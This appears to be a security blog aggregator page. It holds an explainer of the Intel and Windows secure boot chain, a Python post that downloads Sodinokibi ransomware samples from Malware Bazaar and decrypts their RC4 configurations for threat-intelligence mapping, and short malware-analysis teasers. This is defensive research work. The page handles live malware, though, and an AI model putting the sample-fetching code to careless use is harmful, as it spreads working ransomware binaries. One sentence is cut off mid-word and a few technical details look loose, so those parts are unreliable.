The next part to start running is the CSME. Recall from the first post in the series that the CSME, or Converged Security and Management Engine, is a MinuteIA (i486 CPU IP block) embedded in the Platform Controller Hub (PCH). The CSME begins running from its own embedded 128KB ROM, the CSME ROM. This ROM is protected with a hardware fuse that is burned by Intel during production. When started, the CSME ROM starts like a regular 486 processor BIOS: at the reset vector, in real mode. Its first order of business is to enable protected mode. Next it checks whether the system is configured in ROM bypass mode to assist debugging; if so, it maps the ROMB partition in SPI and starts executing from there (we might dig into ROM bypass mode later). Next the CSME's SRAM is initialized, a page table is created mapping SRAM and ROM, and paging is enabled. Once basic initialization is out of the way, the CSME can switch to C code that does some more complex initialization: initializing the IOMMU (AUnit), the IACP and the hardware crypto keys, which are calculated from fixed values in hardware. Finally, the DMA engine is used to read the next stage, called the ROM Boot Extension, or RBE, from the system firmware flash through SPI, and the ROM verifies it against the cryptographic keys prepared earlier. The CSME ROM uses a special table, the Firmware Interface Table, or FIT, a table of pointers to specific regions in the flash that is itself stored at a fixed flash address.

The RBE's job is to load the CSME OS kernel and verify it cryptographically. This process is optimized by a mechanism called ICV, or Integrity Check Values: hardware-cached hashes of verified images. As long as the CSME kernel has the same hash it does not require crypto verification. Another check performed by the RBE is an anti-rollback check, making sure that once the CSME has been upgraded to a new version it cannot be downgraded back to the original version. Before starting the main CSME kernel the RBE loads pre-OS modules. An example pre-OS module is IDLM, which can be used to load debug-signed firmware on a production platform.

The kernel starts by enabling several platform security features: SMEP, Supervisor Mode Execution Prevention, which prevents exploits from getting the kernel to execute code mapped in ring 3 memory, and DEP, Data Execution Prevention, which prevents exploits from running code from stack regions. It also generates per-process syscall table permissions, as well as ACL and IPC permissions.
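The two RBE checks, the ICV fast path and the anti-rollback check, can be sketched as a single decision function. This is a rough model under my own assumptions: the function names are invented, the "signature" is just a bare SHA-256 comparison standing in for the real cryptographic verification, and how the CSME actually stores versions and cached hashes is not covered here.

```python
import hashlib


def verify_signature(image, signature):
    """Stand-in for the real cryptographic check (assumption: a bare SHA-256 compare)."""
    return hashlib.sha256(image).digest() == signature


def rbe_accepts_kernel(image, signature, version, min_version, icv_cache):
    """Return True if the toy RBE would load this kernel image."""
    # Anti-rollback: refuse anything older than the recorded minimum version.
    if version < min_version:
        return False
    digest = hashlib.sha256(image).digest()
    # ICV fast path: an image whose hash was verified before skips the full check.
    if digest in icv_cache:
        return True
    if not verify_signature(image, signature):
        return False
    icv_cache.add(digest)
    return True


cache = set()
kernel = b"csme kernel, version 5"
good_signature = hashlib.sha256(kernel).digest()
print(rbe_accepts_kernel(kernel, good_signature, 5, 4, cache))  # True, full check
print(rbe_accepts_kernel(kernel, good_signature, 5, 4, cache))  # True, cached hash
print(rbe_accepts_kernel(kernel, good_signature, 3, 4, cache))  # False, rollback
```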

Bring-Up (BUP)

Once everything is ready the kernel loads the Process Manager, which executes the "IBL processes", including Bring-Up (BUP) and the Loader. The BUP loads the virtual file system (VFS) server, parses the init script of the FTPR partition and loads all IBL modules listed there. These include: the Event Dispatcher Server (eventdisp), a service that allows publishing, registering and acknowledging receipt of named events (a sort of DBUS); the Bus Driver (busdrv), a driver that permits other drivers to access devices on the CSME's internal bus; the RTC driver (prtc); the Crypto/DMA driver (crypto), which provides access to services offered by the OCS hardware (SKS, DMA engines); the Storage driver (storage), which provides access to the MFS filesystem; the Fuse driver (fpf); and finally the Loader Server (loadmgr).

As seen in the image below, this is the stage where the CPU finally begins execution.

CPU initialization

Once the CSME is ready it releases the main CPU from the RESET state. The main CPU loads microcode from the FIT and sets it up (after the CSME has verified the uCode cryptographically). I won't go into details about microcode, also called uCode, here, as I have a full post planned on microcode later. What's important to know is that microcode does not only include the "implementation" of the instruction set architecture (ISA), but also many routines for initialization, reset, paging, MSRs and much, much more. As part of CPU initialization it loads another module from the FIT, the Authenticated Code Module (ACM). The ACM implements BootGuard (once called "AnchorCove"), a security feature that cryptographically verifies the UEFI signature before it is loaded. This begins the Static Root of Trust for Measurement (SRTM), where the CSME ROM verifies the CSME, which verifies the microcode, which verifies the ACM, which verifies the UEFI firmware, which verifies the operating system. This is done by chaining their hashes and storing them in the TPM. The ACM also initializes TXT, which provides the Dynamic Root of Trust for Measurement (DRTM) that we will detail in a few paragraphs.
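The chain idea is simple enough to model in a few lines: every stage knows the expected hash of the stage that follows it, and only the hash of the very first stage has to be trusted up front. The sketch below is a deliberately simplified illustration with invented helper names. Real platforms use signatures and fused keys rather than bare hashes, and the stage list is just the one from the paragraph above.

```python
import hashlib


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def build_chain(images):
    """images: list of (name, image). Returns (stages, trusted_root_hash)."""
    stages = []
    next_hash = None
    for name, image in reversed(images):
        # Each stage carries the expected hash of the stage that follows it.
        stages.append((name, image, next_hash))
        next_hash = sha256(image)
    stages.reverse()
    return stages, next_hash


def run_chain(stages, trusted_root_hash):
    """Return the names of the stages that were allowed to run."""
    executed = []
    expected = trusted_root_hash
    for name, image, next_expected in stages:
        if sha256(image) != expected:
            break  # verification failed: control is never handed over
        executed.append(name)
        expected = next_expected
    return executed


images = [("CSME", b"csme"), ("microcode", b"ucode"), ("ACM", b"acm"), ("UEFI", b"uefi")]
stages, root = build_chain(images)
print(run_chain(stages, root))

tampered = list(stages)
tampered[2] = ("ACM", b"evil acm", stages[2][2])
print(run_chain(tampered, root))
```

With the untouched images all four stages run; with the modified ACM the chain stops after the microcode, because nothing that comes after a failed check is ever executed.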

UEFI initialization

UEFI Initialization stages

Once the CPU completes initialization, the Initial Boot Block (IBB) of the UEFI firmware is executed. The startup ACM authenticates parts of the FIT and the IBB using the OEM key burned into the fuses and measures them into PCR0 in the TPM. PCR0 is also referred to as the CRTM (Core Root of Trust for Measurement).

The first stage of the IBB is SEC, which is responsible for very early platform initialization and for loading the UEFI secure boot databases from non-volatile (NV) storage (these keys have various names such as PK, KEK, DB, DBX). Next comes the PEI core, the "main" module of Pre-EFI Initialization. It loads several modules (PEIMs) that initialize basic hardware such as memory, PCI-E, USB, basic graphics, basic power management and more. Some of this code is implemented by the UEFI vendors or OEMs, and some comes from Intel in "FSPs", Firmware Support Packages, which perform "Silicon Initialization". Common UEFI firmware images can have as many as 100 PEI modules.

The UEFI spec does not cover signature/authentication checks in the PEI phases. That's why Intel needed BootGuard to do the bootstrapping: at power-on, BootGuard measures the IBB ranges, which include PEI.

Following PEI, the Driver Execution Environment (DXE) is loaded by a security PEI module, which verifies its integrity cryptographically beforehand. DXE is responsible for setting up all the rest of the hardware and software execution environment in preparation for OS loading. It also sets up System Management Mode (which we'll talk about soon), sensors and monitoring, boot services, real-time clocks and more. A modern UEFI firmware can have as many as 200 different DXE drivers installed.

Many OEMs use BootGuard to authenticate DXE as well by configuring the IBBs to include the entire PEI volume in the flash (PEI Core + PEI modules) and the DXE Core. Secure Boot is used to verify each PEI/DXE image that is loaded before executing it. These images are measured and extended into the TPM's PCR0 as well.

The DXE environment initializes two important tables: the EFI Runtime services table and the EFI Boot Service Table. Boot Services are used by the operating system only during boot and discarded thereafter. These include memory allocation services and services to access DXE drivers like storage, networking and display. Runtime services are kept in memory for use by the operating system whenever required, and include routines for getting and setting the value of EFI variables, clock manipulation, hardware configuration, firmware capsule updates and more.

Finally the UEFI firmware measures the platform (e.g. chipset) security configuration (NV variables) into PCR1 and then locks them by calling a function in the ACM.

UEFI boot stages

Loading the boot loader

The final driver to be loaded by DXE is the Boot Device Selection module, or BDS. BDS scans its stored configuration, compares it with the currently available hardware and decides on a boot device. This is what gets executed in legacy boot and on non-Secure Boot systems. In Secure Boot mode another DXE component, called SecureBootDXE, is loaded to authenticate the OS boot loader. The cryptographic key used is stored in DXE and verified as part of BootGuard. SecureBootDXE also compares the boot loader against a signed list of blacklisted or whitelisted loaders.
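The whitelist/blacklist comparison boils down to a lookup in which the deny list always wins. Here is a minimal sketch that only handles plain SHA-256 hash entries. The function name and the sample loaders are made up, and real Secure Boot databases also contain certificates and hash the image in a PE-specific way, which is left out here.

```python
import hashlib


def loader_allowed(image, db, dbx):
    """Toy allow/deny check: dbx (forbidden) takes precedence over db (allowed)."""
    digest = hashlib.sha256(image).hexdigest()
    if digest in dbx:
        return False
    return digest in db


good_loader = b"boot loader 2.0"
old_loader = b"boot loader 1.0 with a known bug"
db = {hashlib.sha256(good_loader).hexdigest(), hashlib.sha256(old_loader).hexdigest()}
dbx = {hashlib.sha256(old_loader).hexdigest()}

print(loader_allowed(good_loader, db, dbx))         # True
print(loader_allowed(old_loader, db, dbx))          # False, revoked
print(loader_allowed(b"unknown loader", db, dbx))   # False, not in db
```

Checking the deny list first matters: it lets a vendor revoke a loader that was once legitimately allowed without having to touch the allow list.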

Windows Boot

Now we are ready for Transient System Load (TSL): most of DXE gets discarded and the OS bootloader is loaded. The bootloader (called the IPL) is measured into PCR4 and control is transferred to it. For Windows this is bootmgfw.efi, the Windows Boot Manager. It first initializes security policies, handles sleep states like hibernation, and finally uses EFI boot services to load the Windows loader, winload.efi.

Winload

Winload initializes the system's page tables in preparation for loading the kernel, loads the system registry hive, and loads the kernel, the Hardware Abstraction Layer (HAL DLL) and the early boot drivers. They are all authenticated cryptographically, and their measurements are stored in the TPM. Once that's done, it uses UEFI memory services to initialize the IOMMU. Once everything is loaded into its correct place in memory, the EFI boot services are discarded.

HVCI

When HVCI, or Hypervisor-protected Code Integrity, is enabled, a different process occurs. Winload does not load the kernel; instead it loads the hypervisor loader (hvload.efi), which in turn loads the hypervisor (hvix64.exe) and sets up a protected virtual machine called VTL1 - Virtual Trust Level 1. It then loads the Secure Kernel (SK) into VTL1, and then sets up VTL0, the untrusted level for the normal kernel. Now winload.efi is resumed within VTL0 and continues to boot the system within VTL0. The secure kernel continues running in the background, providing security features like authentication as well as memory protection services for VTL0.

It's important to note that the hypervisor and secure kernel do not trust UEFI and do not initiate any UEFI calls while running. Any future UEFI runtime service calls will be executed from within the VTL0 virtual machine, and are thus prevented from harming the hypervisor and secure kernel.

The regular OS kernel boot then continues in VTL0. Malicious UEFI and driver code cannot affect the hypervisor or the secure kernel. Malicious drivers can and will continue to attack user mode code in VTL0, but they must be signed by Microsoft and thus can be analyzed before being approved, or blocked quickly if a bug/exploit is found.

Dynamic Root of Trust for Measurement (DRTM)

The whole security model presented so far is based on a chain of verifications. But what happens if that chain is broken by a bug? UEFI implementations have many security bugs, and those affect the security of the whole system. To alleviate this issue Intel and Microsoft developed the Dynamic Root of Trust for Measurement (DRTM), available since Windows 10 18H2. In DRTM, winload starts a new load verification chain using an Intel security feature called TXT. TXT measures critical parts of the OS during OS loading. The process is initiated by the OS executing a special instruction, GETSEC[SENTER], implemented in microcode, which results in the loading, authentication and execution of an ACM called the Secure Init ACM (SINIT ACM). The ACM can be on the flash, or can be supplied by the OS with the GETSEC instruction.

DRTM Model

The GETSEC[SENTER] microcode flow clears PCRs 17-23, makes an initial measurement into PCR17 that includes the SINIT ACM and the parameters of the GETSEC instruction, and executes the SINIT ACM. SINIT measures additional secure-launch related items into PCR17, including the STM (if present), a digest of the Intel Early TXT code and the matching elements of the Launch Control Policy (LCP). The LCP checks that the platform is in a known-good state by checking PCRs 0-7, and that the OS is in a known-good state by checking PCRs 18-19. Next SINIT measures the authorities involved so far into PCR18; the measurement is of the authority (e.g. the signer/key) and not of the data, to allow for upgrades.

The OS now continues to load and use the PCRs for attestation telemetry.

SecureBoot + DRTM + BitLocker (Windows uses PCRs 7 and 11 for Secure Boot based BitLocker) make sure the system is almost impervious to attacks.

The Windows secure boot process is implemented in an executable called tcblaunch.exe (TCB stands for Trusted Computing Base). This is the executable the SINIT ACM measures and launches. The reason tcblaunch.exe was invented is that data generated from within tcblaunch is considered secure, while data generated from winload can be tainted. A funny artifact of the MLE launch process is caused by the fact that it is 32-bit, but tcblaunch.exe is 64-bit. Microsoft hacked around this by providing a 32-bit mlestartup.exe binary inside the MSDOS header region of the MZ/PE file.

Windows MLE + HV

UEFI Memory Attributes Table

As stated before, Windows wants to run the UEFI runtime services in VTL0. By default the OS cannot lock these memory pages to be W^X (writable or executable, but not both) because many old UEFI systems still mix code and data. Microsoft solves this by introducing a new UEFI table, the UEFI Memory Attributes Table (MAT), which specifies whether the runtime services can execute from VTL0 (by marking their memory regions as EFI_MEMORY_RO|EFI_MEMORY_XP) or must run with RWX protections. Since the latter is a gaping hole, the UEFI runtime's parameters are sanitized using VTL code, and this is enabled only for a restricted subset of runtime calls.
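To see what the MAT attributes buy the OS, here is a small sketch that classifies a runtime memory region from its attribute bits. The two constants are the EFI_MEMORY_RO and EFI_MEMORY_XP values from the UEFI specification; the function, its labels and my reading that a region should carry one flag or the other are illustrative assumptions, not how Windows actually evaluates the table.

```python
EFI_MEMORY_XP = 0x4000    # region must not be executed
EFI_MEMORY_RO = 0x20000   # region must not be written


def classify_region(attribute):
    """Map the RO/XP bits of a memory descriptor to an effective protection."""
    read_only = bool(attribute & EFI_MEMORY_RO)
    no_execute = bool(attribute & EFI_MEMORY_XP)
    if read_only and not no_execute:
        return "code (R-X)"
    if no_execute and not read_only:
        return "data (RW-)"
    if read_only and no_execute:
        return "read-only data (R--)"
    return "unprotected (RWX)"


for attr in (EFI_MEMORY_RO, EFI_MEMORY_XP, 0):
    print(hex(attr), classify_region(attr))
```

Only the last case, a region with neither bit set, is the RWX situation that violates W^X and needs the extra sanitization described above.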

Other OSs

[IMAGE]

Some Linux distributions use Intel's TBOOT implementation for DRTM launch. VMware ESXi supports DRTM and TXT from version 6.7U1 using a customized version of TBOOT, and attestation information is managed through vSphere.

[IMAGE]

More Protections

IOMMU and DMA protections

DMA is a platform feature that allows hardware to write directly to main memory, bypassing the CPU. This greatly enhances performance, but comes with a security cost: hardware can overwrite UEFI or OS memory after it has been measured and authenticated. This means malicious hardware can attack the OS after boot and tamper with it.

To solve this problem the memory management controller of the platform was extended to protect IO, and called the IOMMU. Intel calls this technology VT-d, and it implements address paging with permissions for DMA. The IOMMU allows the OS and its drivers to set up the memory regions devices are allowed to write to. Another protection mechanism in the IOMMU, used by the UEFI firmware and later by the OS, is Protected Memory Regions, or PMRs. These define regions that can only be accessed from the OS on the CPU and never by devices through DMA. The IOMMU must be enabled very early in boot to protect against malicious on-board firmware attacking before the OS loads.

To ensure the mechanism for setting up the PMRs is not tampered with, it too is measured, including the IOMMU ACPI table, the APIC table, the RAM structure definition, and the DMA protection information.
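The PMR idea can be reduced to a range check performed on every device access. The sketch below is a toy model with made-up addresses and an invented function name; real VT-d hardware does this in silicon and also offers full per-device page tables, which are not modelled here.

```python
def dma_allowed(address, length, protected_regions):
    """True if the DMA window [address, address + length) touches no protected region."""
    end = address + length
    return all(end <= start or address >= stop for start, stop in protected_regions)


# Made-up protected regions: (start, stop) with stop exclusive.
pmrs = [(0x0010_0000, 0x0800_0000), (0x1_0000_0000, 0x1_4000_0000)]

print(dma_allowed(0x0000_1000, 0x1000, pmrs))   # True, below the first region
print(dma_allowed(0x000F_F000, 0x2000, pmrs))   # False, crosses into a region
print(dma_allowed(0x1_2000_0000, 0x40, pmrs))   # False, inside the second region
```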

Windows uses the IOMMU and PMRs to protect itself since Windows 10 18H2, and calls this feature Kernel DMA Protection. The Kernel DMA protection prevents DMA to VTL1, hypervisor and VTL0's kernel regions. Microsoft also allows special implement

There is an undocumented feature in the kernel used by Graphics/DirectX to allow sharing the kernel's virtual memory address space with the graphics card (Device-TLB, ExShareAddressSpaceWithDevice()).

Secure Devices

Microsoft allows some devices to be isolated from VTL0 and used only from code in VTL1, to protect sensitive information used for logon, like the face recognition camera and fingerprint sensors. Secure devices are discovered using the ACPI table "SDEV" (SDEV_SECURE_RESOURCE_ID_ENTRY, SDEV_SECURE_RESOURCE_MEMORY_ENTRY).

Secure devices can be either pure-ACPI devices or PCI devices. Both can be targets for DMA requests.

It seems the drivers for secure devices are actually VTL1 user-mode processes that call basic functions in IUMBASE to communicate with the device (DMA, read/write PCI configuration space, do memory-mapped IO), for example: GetDmaEnabler / DmaMapMemory / SetDmaTargetProperties / MapSecureIo / UnmapSecureIo.

SMM

SMM, or System Management Mode, is a special mode invoked to handle various hardware and software interrupts, and is implemented as part of the UEFI firmware. For example, SMM can simulate a PS/2 keyboard by handling keyboard interrupts and translating them into USB reads/writes. When a legacy application performs an IO IN/OUT operation on a PS/2 port, the SMI handler registered for that port is executed: it transfers the system into SMM, runs the DXE USB keyboard driver, and then returns the result transparently. SMM is also used for security features by allowing certain actions to occur only from SMM. The caveat of SMM is that it has full access to the system and operates in "ring -2", even higher than VTL1 and the hypervisor. It has been used for attacks for many years (search for the NSA's SOUFFLETROUGH).

Intel & Microsoft have developed three technologies to protect the OS from SMM: IRBR, STM, PPAM.

IRBR, or Intel Runtime BIOS Resilience, runs the SMI handler in protected mode with paging enabled, with a page table set up to only map SMRAM, as well as CPU protection to prevent changes to the paging table in SMM mode.

STM - SMM Transfer Monitor, means that most of the SMI handler is virtualized, with only a small part called the STM serving as its hypervisor. I don't think it is actually implemented in UEFI.

PPAM - also called Nifty Rock or Devil's Gate Rock, tries to fill the gap between IRBR and STM by prepending an Intel entry point to the SMI handler. Intel supplies a signed module called PPAM that can measure certain attributes of the SMI handler and report them to the OS. The OS can then make a policy decision on how to proceed. All SMI handlers must also be registered in a table called the WSMT table. The firmware's WSMT table declares to the OS that the firmware guarantees three things: FixedCommBuffers, a guarantee that SMM will validate the input/output buffers of the operation; CommBufferNestedPtrProtection, which extends this guarantee to any pointers within the input/output structures; and SystemResourceProtection, which indicates that the SMI handler will not reconfigure the hardware.
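The three WSMT guarantees are published as individual bits in the table's protection flags field, so checking what a given firmware promises is a matter of decoding a small bitmask. Here is a minimal sketch: the bit values follow the WSMT definition in the ACPI tables, while the enum and function names are my own and the flag value in the example is made up.

```python
import enum


class WsmtFlags(enum.IntFlag):
    FIXED_COMM_BUFFERS = 0x1
    COMM_BUFFER_NESTED_PTR_PROTECTION = 0x2
    SYSTEM_RESOURCE_PROTECTION = 0x4


def describe_wsmt(protection_flags):
    """Return the names of the guarantees set in a WSMT protection flags value."""
    flags = WsmtFlags(protection_flags & 0x7)  # ignore reserved bits
    return [flag.name for flag in WsmtFlags if flag in flags]


# Made-up value: the firmware promises fixed buffers and resource protection only.
print(describe_wsmt(0x5))
```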

Memory Reset protections

After a warm boot or even a fast cold boot some secrets (keys) might remain in memory. Intel provides security for these secrets using special TXT Secrets registers.

Starting a blog at this time

1 February 2021 at 05:00

Is this a good time to start a new cyber security blog?

I have been working in cybersecurity for quite some time, but have always been afraid of writing publicly about my work: afraid of being publicly ridiculed for my work, afraid of my English proficiency and afraid in general.

When I finally got the courage to start, the North Korean blog thing happened, literally half an hour before I was about to begin, throwing me way down.

But finally I decided to go anyway.

I’ll be posting a lot of my backlog in the next few weeks, including: the Intel PC boot process, Intel uCode stuff, and experiences as a blue teamer.

Let's hope someone somewhere ever reads these words.

Too-doo-loo, Igor

Project Sodinokibi

29 October 2020 at 08:59
By: Kartone

Learning Python

Project Sodinokibi

Python is the language I always wanted to learn. I tried but failed every single time, I don't know exactly why. This time was different though, I knew it from the first line of code. So, with a little push from a dear friend of mine (thanks Elio!), I tried to investigate how to decode Sodinokibi ransomware configurations for hundreds, maybe thousands, of samples. Using the powerful insights from the VirusTotal Enterprise API, I wanted to understand whether there are relationships between the Threat Actor, mapped inside the ransomware configuration, and the country visible from the VirusTotal sample submission.
I am perfectly aware that it's not as easy as it seems: the ransomware sample submission's country, visible from VirusTotal, may not be the country affected by the ransomware itself. But, in one case or another, I think there could somehow be a link between the two parameters: maybe from the Incident Response perspective.

Getting the samples

My first step was to get as many samples as I could. My first thought was to use the VirusTotal API: I'm lucky enough to have an Enterprise account, but the results were overwhelming and, since I was experimenting with Python, the risk of running too many requests and exhausting my quota was too high. So I opted to use another excellent malware sharing platform: Malware Bazaar by Abuse.ch

All the code is available here

import glob
import ntpath
import os

import requests

# args, SAMPLES_PATH, EXT_TO_CLEAN, get_sample() and housekeeping() are defined elsewhere in the script.
data = {'query': 'get_taginfo', 'tag': args.tag_sample, 'limit': 1000}
response = requests.post('https://mb-api.abuse.ch/api/v1/', data=data, timeout=10)
maldata = response.json()

# Samples are stored under their SHA-256 hash, so the file name without extension identifies them.
print("[+] Retrieving the list of downloaded samples...")
downloaded_samples = []
for file in glob.glob(SAMPLES_PATH + '*'):
    filename = ntpath.basename(os.path.splitext(file)[0])
    downloaded_samples.append(filename)
print("[+] We have a total of %s samples" % len(downloaded_samples))

for entry in maldata["data"]:
    # Decryptor executables are published under the same tag: skip them.
    if "Decryptor" in entry["tags"]:
        print("[+] Skipping the sample because of Tag: Decryptor")
        continue
    value = entry.get("sha256_hash")
    if value and value not in downloaded_samples:
        print("[+] Downloading sample with ", "sha256_hash", "->", value)
        if args.get_sample:
            get_sample(value)
        if args.clean_sample:
            housekeeping(EXT_TO_CLEAN)

This block of code essentially builds the request for the back-end API, where the tag to search for comes from a command line parameter. I defaulted it to Sodinokibi. It then creates a list of the samples already present in the ./samples directory so as not to download them again. Interestingly, because there are many Sodinokibi decryptor executables on the Malware Bazaar platform, I needed some sort of sanitization to avoid downloading them. When it finds a sample that is not present in the local directory, it calls the function to download it.
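The selection logic described above can also be pulled out into a small function that is easy to test without touching the network. This is just a sketch of the idea, not the code from the repository: the function name is made up, and the sample response below contains invented data in the shape the script expects.

```python
def hashes_to_download(entries, already_downloaded, skip_tag="Decryptor"):
    """Return the SHA-256 hashes that are neither skipped by tag nor already on disk."""
    wanted = []
    for entry in entries:
        tags = entry.get("tags") or []   # treat a missing or null tag list as empty
        if skip_tag in tags:
            continue
        sha256 = entry.get("sha256_hash")
        if sha256 and sha256 not in already_downloaded:
            wanted.append(sha256)
    return wanted


sample_response = {  # made-up data, not real hashes
    "data": [
        {"sha256_hash": "aa11", "tags": ["Sodinokibi"]},
        {"sha256_hash": "bb22", "tags": ["Sodinokibi", "Decryptor"]},
        {"sha256_hash": "cc33", "tags": ["Sodinokibi"]},
    ]
}
print(hashes_to_download(sample_response["data"], {"cc33"}))  # ['aa11']
```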

def get_sample(sha256_hash):
    # Needs `import requests` and `import pyzipper`; KEY, SAMPLES_PATH and ZIP_PASSWORD are defined elsewhere in the script.
    headers = {'API-KEY': KEY}
    data = {'query': 'get_file', 'sha256_hash': sha256_hash}
    response = requests.post('https://mb-api.abuse.ch/api/v1/', data=data, timeout=15, headers=headers, allow_redirects=True)
    zip_path = SAMPLES_PATH + sha256_hash + '.zip'
    # Save the password-protected archive returned by the API.
    with open(zip_path, 'wb') as f:
        f.write(response.content)
    print("[+] Sample downloaded successfully")
    # Unpack it into the samples directory; pwd must be a bytes object.
    with pyzipper.AESZipFile(zip_path) as zf:
        zf.extractall(path=SAMPLES_PATH, pwd=ZIP_PASSWORD)
    print("[+] Sample unpacked successfully")

A straightforward function: it builds the API call, gets the zipped sample, unpacks it, and saves it inside the ./samples directory. Note that the sample filenames are always their SHA-256 hash. After unpacking, a small housekeeping function gets rid of the zip files.

def housekeeping(ext):
    try:
        for f in glob.glob(SAMPLES_PATH+'*.'+ext):
            os.remove(f)
    except OSError as e:
        print("Error: %s - %s " % (e.filename, e.strerror))

This is what happens when you run the script.

Getting insights on ransomware configuration

Now it's time to analyze these samples to get the pieces of information we need. The plan is to extract the RC4-encrypted configuration stored inside a PE file section and save the ActorID, the CampaignID, and the executable hash. With the latter, we then query the VirusTotal API to get insights on the sample submission: the City and the Country the sample was submitted from, and when the submission happened. As I wanted to put these pieces of information on a map, I then used the OpenCage API to obtain the coordinates of the submission cities.

The code that builds the API calls and parses the JSON responses is rough, shallow and straightforward, so I won't go through it. I'm sure there are plenty of better ways to do its job, but... it's my first time with Python! So bear with me, please. What I think is interesting is the function that extracts and decrypts the configuration from the ransomware executable PE file. These are the lines of code that do this task:

import hashlib
import json
import os
import struct

import pefile
from Crypto.Cipher import ARC4  # assumption: ARC4 comes from PyCryptodome

# Section names that are skipped when looking for the configuration.
excluded_sections = ['.text', '.rdata', '.data', '.reloc', '.rsrc', '.cfg']

def arc4(key, enc_data):
    cipher = ARC4.new(key)
    return cipher.decrypt(enc_data)

def decode_sodinokibi_configuration(f):
    filename = os.path.join('./samples', f) + '.exe'
    with open(filename, "rb") as file:
        content = file.read()
    str_hash = hashlib.sha256(content).hexdigest()
    pe = pefile.PE(filename)
    for section in pe.sections:
        section_name = section.Name.decode().rstrip('\x00')
        if section_name not in excluded_sections:
            data = section.get_data()
            # Bytes 0x00-0x1f hold the RC4 key, 0x24-0x27 the little-endian length of the encrypted data.
            enc_len = struct.unpack('<I', data[0x24:0x28])[0]
            dec_data = arc4(data[0:32], data[0x28:enc_len + 0x28])
            # Drop the last byte before parsing the JSON configuration.
            parsed = json.loads(dec_data[:-1])
            # Sample SHA-256, Actor ID and Campaign ID; parsed['pk'] holds the attacker's public encryption key.
            return str_hash, parsed['pid'], parsed['sub']
    # No candidate section found (e.g. a packed sample).
    return None

Disclaimer: these lines are, obviously, not mine. I modified the script provided by the guys of BlackBerry ThreatVector. I invite you to read where they explain how the configuration is stored within the section, where's the RC4 encryption key and how to decrypt it.

My version of the script runs on Python 3 and uses a standard library for the RC4 algorithm. It's also worth mentioning that the script fails if the input samples are packed: it expects a specific section holding the encrypted configuration, and it fails otherwise. I added some checks to avoid the most miserable crashes, but there are still unhandled cases: I'm so new to Python!
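To make the section layout used by the script easier to see, here is a minimal sketch that does not need pefile or a crypto library. It assumes the layout implied by the offsets in the code above (key in the first 32 bytes, encrypted length at 0x24, encrypted data from 0x28). The helper names rc4, parse_config_section and build_fake_section are hypothetical and exist only for this illustration, and the fake section is synthetic data, not a real sample.

```python
import json
import struct

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by XOR with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def parse_config_section(data: bytes) -> dict:
    """Decrypt and parse a section laid out as the script above expects."""
    key = data[0:32]
    (enc_len,) = struct.unpack("<I", data[0x24:0x28])
    plain = rc4(key, data[0x28:0x28 + enc_len])
    return json.loads(plain[:-1])  # drop the trailing byte, as the script does

def build_fake_section(config: dict, key: bytes) -> bytes:
    """Build a synthetic section with the same layout (illustration only)."""
    plain = json.dumps(config).encode() + b"\x00"
    # 32-byte key, 4 bytes the script never reads, then the length DWORD
    header = key + b"\x00" * 4 + struct.pack("<I", len(plain))
    return header + rc4(key, plain)
```

Since RC4 is symmetric, the same rc4 function both builds the fake section and decrypts it, which makes a quick round trip an easy sanity check before pointing the parser at real section data.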

In the end, we have a dear old CSV file enriched with a bunch of information: Country, City, Latitude, Longitude, ActorID, CampaignID, Hash, Timestamp. We're ready to map it.

Understanding the data

Our data is described inside a data.csv

Project Sodinokibi

The aid (ActorID) field changed over the months from an integer, like ActorID: 39, to a hash representation. For now, we have only 174 samples from which we managed to extract the configuration. We can now group the data by the aid field and count the submissions.

Project Sodinokibi
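The grouping step can be sketched with the standard library alone. The rows below are made up for illustration and the reduced column set is an assumption; only the aid field name comes from the text above.

```python
import csv
import io
from collections import Counter

# Made-up rows, only to show the shape of the grouping
SAMPLE_CSV = """Country,City,aid
US,Ashburn,39
US,Ashburn,39
IT,Rome,12
"""

def count_by_actor(csv_text):
    """Count submissions per ActorID (aid column)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return Counter(row["aid"] for row in reader)

def count_by_actor_and_city(csv_text):
    """Count submissions per (ActorID, City) pair."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return Counter((row["aid"], row["City"]) for row in reader)
```

Counter.most_common() then gives the actors, or the actor and city pairs, ordered by number of submissions.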

From what I see, the samples related to the threat actor with ID 39 have nine submissions from the city of Ashburn, US. I still have to understand why this city has so many submissions related to Sodinokibi. I hope that someone who reads this post can help me shed some light on it.

If we map the ThreatActorID vs the City of the submission, we can easily see the data.

Project Sodinokibi
ThreatActors vs Submissions City
Project Sodinokibi
Submissions City vs Submissions count

Next steps would be acquiring as many samples as I can. The best choice would be using VirusTotal API to retrieve the samples and this is what I'm going to do. Hopefully I won't burn my entire Company API limit.

All the scripts used in this post, the data and the Jupyter notebook used to map the data are available here.

Tools Update vs Latest Maldocs

25 May 2020 at 12:00
A couple of tools have been updated to make it easier to handle the latest malicious documents...

Another Way to Analyze XLM Macros

17 April 2020 at 12:00
XLM macros have been making a comeback so it's important to be able to analyze them. I wrote a proof of concept tool that provides insight into what it's doing...

Choose Again.

28 February 2020 at 13:50
By: Kafeine

This is the last post/activity you'll see on MDNC.

I have now chosen to bring the MDNC (Blog/Kafeine/MISP) project to an end.
Thanks to those who helped me during this incredible 8 years journey.

The blog and twitter account will stay up (but inactive) for the records.
The MDNC MISP instance will be shut down in several weeks.

'Choose again.' said Aenea. 'Dan Simmons, The Rise of Endymion'

That's all Folks!

Emotet Stats

1 February 2020 at 12:00
The Emotet gang's email lures, which takes advantage of current news events, seems to be quite convincing and successful...

Reversing a Self-Contained Phishing Page

12 December 2019 at 12:00
I came across this SANS ISC blog article called "Phishing with a self-contained credentials-stealing webpage"...

WannaCry, two years later: a deep look into its code

23 May 2019 at 09:17
By: Kartone

My own technical analysis of the malware that, in 2017, spread like wildfire encrypting thousands of computers, using one of the tools leaked from the National Security Agency by the group named ShadowBrokers.

Almost two years have passed since that weekend of May 2017, when the crypto-worm WannaCry infested the net thanks to the EternalBlue exploit. In roughly two days, WannaCry spread all over the world, infecting almost 230,000 computers in over 150 countries:

WannaCry, two years later: a deep look into its code
By TheAwesomeHwyh

